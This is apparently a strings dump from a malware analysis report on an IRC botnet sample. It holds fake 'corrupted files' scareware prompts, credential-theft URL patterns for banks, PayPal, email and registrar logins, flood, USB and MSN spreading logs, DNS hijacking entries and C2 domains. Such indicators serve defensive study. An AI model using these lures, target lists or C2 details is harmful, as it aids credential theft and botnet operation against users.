Options\%s</pre><pre>Windows has encountered a corrupted folder on your hard drive</pre><pre>Multiple corrupted files have been found in the folder 'My Documents'. To prevent serious loss of data, please allow Windows to restore these files.</pre><pre>Corrupted folder: %s</pre><pre>Corrupted file count: %d</pre><pre><a href=".ms">%s</a></pre><pre>/c start "" "%s" /%s "%s"</pre><pre>shell32,ShellExec_RunDLL "%s" /%s "%s"</pre><pre>You denied the proper privileges to the Windows file restoration utility. Please select YES on the following UAC prompt to allow Windows to restore the corrupted files.</pre><pre>Windows 3.1 Update Service</pre><pre>%s:Zone.Identifier</pre><pre>%s\X.pif</pre><pre>KERNEL32.DLL</pre><pre>KERNELBASE.DLL</pre><pre>kernelbase.dll</pre><pre>oSome operation could not be performed because the system is out of resources. Close some windows and try again.</pre><pre>Setting bit transparency color is not allowed for png images containing alpha value for each pixel (COLOR_RGBALPHA and COLOR_GRAYSCALEALPHA)OThis operation is not valid because the current image contains no valid header.4The new size provided for image resizing is invalid.oThe "Portable Network Graphics" could not be created because invalid image type parameters have being provided.2Software\Microsoft\Windows\CurrentVersion\Explorer</pre><pre>UThis "Portable Network Graphics" image is invalid because it has missing image parts.[Could not decompress the image because it contains invalid compressed data.</pre><pre>Description: BThe "Portable Network Graphics" image contains an invalid palette.</pre><pre>The file being read is not a valid "Portable Network Graphics" image because it contains an invalid header. This file may be corrupted, try obtaining it againnThis "Portable Network Graphics" image is not supported or it might be invalid.</pre><pre>This "Portable Network Graphics" image is not supported because either its width or height exceeds the maximum size of 65535 pixels.</pre><pre>There is no such palette entry.dThis "Portable Network Graphics" image contains an unknown critical part which could not be decoded.pThis "Portable Network Graphics" image is encoded with an unknown compression scheme which could not be decoded.cThis "Portable Network Graphics" image uses an unknown interlace scheme which could not be decoded.-The chunks must be compatible to be assigned.jThis "Portable Network Graphics" image is invalid because the decoder found an unexpected end of the file.8This "Portable Network Graphics" image contains no data.]The program tried to add a existent critical chunk to the current image which is not allowed.IIt's not allowed to add a new chunk because the current image is invalid.7The png image could not be loaded from the resource ID.)Class '%s' is already registered for '%s'%Class '%s' is not registered for '%s'</pre><pre>%s parameter cannot be nil#Feature not supported by this style</pre><pre>Style '%s' is not registered"Cannot unregister the system style</pre><pre>OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters</pre><pre>Failed to Save StreamjThis "Portable Network Graphics" image is not valid because it contains invalid pieces of data (crc error)yThe "Portable Network Graphics" image could not be loaded because one of its main piece of data (ihdr) might be corrupted</pre><pre>Login</pre><pre>"%s" is an invalid pathÊnnot remove shell notification icon"%s requires Windows Vista or later</pre><pre>Button%d</pre><pre>RadioButton%d</pre><pre>Unable to load style '%s'</pre><pre>Unable to load styles: %s</pre><pre>Style '%s' already registered#Style class '%s' already registered</pre><pre>Style '%s' not found</pre><pre>Style class '%s' not found</pre><pre>All Clipboard does not support Icons</pre><pre>Cannot open clipboard: %s</pre><pre>Text exceeds memo capacity Operation not supported on selected printer.There is no default printer currently selected/Menu '%s' is already being used by another form</pre><pre>- Dock zone has no controlLError loading dock zone from the stream. Expecting version %d, but found %d.7Length of value array must be >= length of prompt array</pre><pre>&Password</pre><pre>Value must be between %d and %d</pre><pre>%s on %s@GroupIndex cannot be less than a previous menu item's GroupIndex5Cannot create form. No MDI forms are currently active0Can only modify an image if it contains a bitmap*A control cannot have itself as its parent</pre><pre>Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window$Parent given is not a parent of '%s'</pre><pre>%s property out of rangeGNo single cast observer with ID %d was added to the observer collectionFNo multi cast observer with ID %d was added to the observer collection</pre><pre>Scan line index out of range!Cannot change the size of an iconÊnnot change the size of a WIC Image$Unknown picture file extension (.%s)</pre><pre>Unsupported clipboard format</pre><pre>Canvas does not allow drawing#Text format flag '%s' not supported</pre><pre>Windows Server 2003</pre><pre>Windows Server 2003 R2</pre><pre>Windows Server 2012</pre><pre>Windows 8</pre><pre>Error writing zip file"Invalid Zip Local Header signature$Invalid Zip Central Header signature1Support for compression method not registered: %s</pre><pre>Observer is not supportedLCannot have multiple single cast observers added to the observers collection4The object does not implement the observer interface5Insufficient RTTI available to support this operation</pre><pre>Parameter count mismatch<Type><pre>Windows</pre><pre>Windows Vista</pre><pre>Windows Server 2008</pre><pre>Windows 7</pre><pre>Windows Server 2008 R2</pre><pre>Windows 2000</pre><pre>Windows XP</pre><pre>Timespan too longbThe duration cannot be returned because the absolute value exceeds the value of TTimeSpan.MaxValue</pre><pre>No help found for context %d</pre><pre>No help found for %s</pre><pre>Parameter %s cannot be nil'Parameter %s cannot be a negative value*Input buffer exceeded for %s = %d, %s = %d</pre><pre>The specified path is too long The specified path was not found The path format is not supported</pre><pre>The drive cannot be found The specified file was not foundWThe given "%s" local time is invalid (situated within the missing period prior to DST).$No help viewer that supports filters</pre><pre>Invalid Timeout value: %s</pre><pre>Failed to create key %s</pre><pre>Failed to get data for '%s'</pre><pre>Failed to set data for '%s'</pre><pre>Resource %s not found</pre><pre>%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group</pre><pre>Property %s does not exist</pre><pre>Thread creation error: %s</pre><pre>Thread Error: %s (%d)-Cannot terminate an externally created thread,Cannot wait for an externally created thread2Cannot call Start on a running or suspended thread;Cannot call CheckTerminated on an externally created thread</pre><pre>Unable to write to %s</pre><pre>Invalid file name - %s</pre><pre>'%s' is an invalid mask at (%d)$''%s'' is not a valid component name</pre><pre>Invalid data type for '%s' List capacity out of bounds (%d)</pre><pre>List count out of bounds (%d)</pre><pre>List index out of bounds (%d) Out of memory while expanding memory stream)%s has not been registered as a COM class</pre><pre>Error reading %s%s%s: %s</pre><pre>Invalid count (%d)</pre><pre>Invalid destination index (%d)</pre><pre>Ancestor for '%s' not found</pre><pre>Cannot assign a %s to a %s</pre><pre>Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread</pre><pre>Class %s not found</pre><pre>A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates</pre><pre>Cannot create file "%s". %s</pre><pre>Cannot open file "%s". %s</pre><pre>Invalid destination array"Character index out of bounds (%d)</pre><pre>Start index out of bounds (%d)</pre><pre>%s (%s, line %d)</pre><pre>Abstract Error?Access violation at address %p in module '%s'. %s of address %p</pre><pre>System Error. Code: %d.</pre><pre>2Too many custom variant types have been registered5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)</pre><pre>Operation not supported</pre><pre>External exception %x</pre><pre>Interface not supported</pre><pre>Object lock not owned(Monitor support function not initialized</pre><pre>Application Error1Format '%s' invalid or incompatible with argument</pre><pre>No argument for format '%s'"Variant method calls not supported</pre><pre>Invalid variant operation</pre><pre>Invalid NULL variant operation%Invalid variant operation (%s%.8x)</pre><pre>%s,Custom variant type (%s%.4x) is out of range/Custom variant type (%s%.4x) already used by %s*Custom variant type (%s%.4x) is not usable</pre><pre>Integer overflow Invalid floating point operation</pre><pre>Invalid pointer operation</pre><pre>Invalid class typecast0Access violation at address %p. %s of address %p</pre><pre>Privileged instruction(Exception %s in module %s at %p.</pre><pre><unknown>!'%s' is not a valid integer value('%s' is not a valid floating point value</unknown></pre><pre>'%s' is not a valid date</pre><pre>'%s' is not a valid time!'%s' is not a valid date and time '%d.%d' is not a valid timestamp</pre><pre>'%s' is not a valid GUID value</pre><pre>I/O error %d</pre>Explorer.EXE_1912_rwx_02500000_0004E000:<pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0Q</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>kernel32.dll</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>ntdll.dll</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s (p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL '%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>shell32.dll</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d KB/s</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>URLDownloadToFileW</pre><pre>URLDownloadToFileA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>DNSAPI.dll</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>SHLWAPI.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>GetProcessHeap</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegNotifyChangeKeyValue</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>]1.1.0.0</pre><pre>msn.set</pre><pre>msn.int</pre><pre>http.set</pre><pre>http.int</pre><pre>http.inj</pre><pre>logins</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. [e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>\\.\pipe\c1419a97</pre><pre>%WinDir%\Explorer.EXE</pre><pre>%WinDir%</pre><pre>%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe</pre><pre>7 767<7~7</pre><pre>8*808;8~8</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" %S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>wininet.dll</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>notepad.exe</pre><pre>Aadvapi32.dll</pre><pre>urlmon.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\Device\HarddiskVolume1\WINDOWS\explorer.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ngggg.exe</pre></Type></pre></w></pre></Type></pre></w></pre></Type></pre></w></pre></Type></pre></w>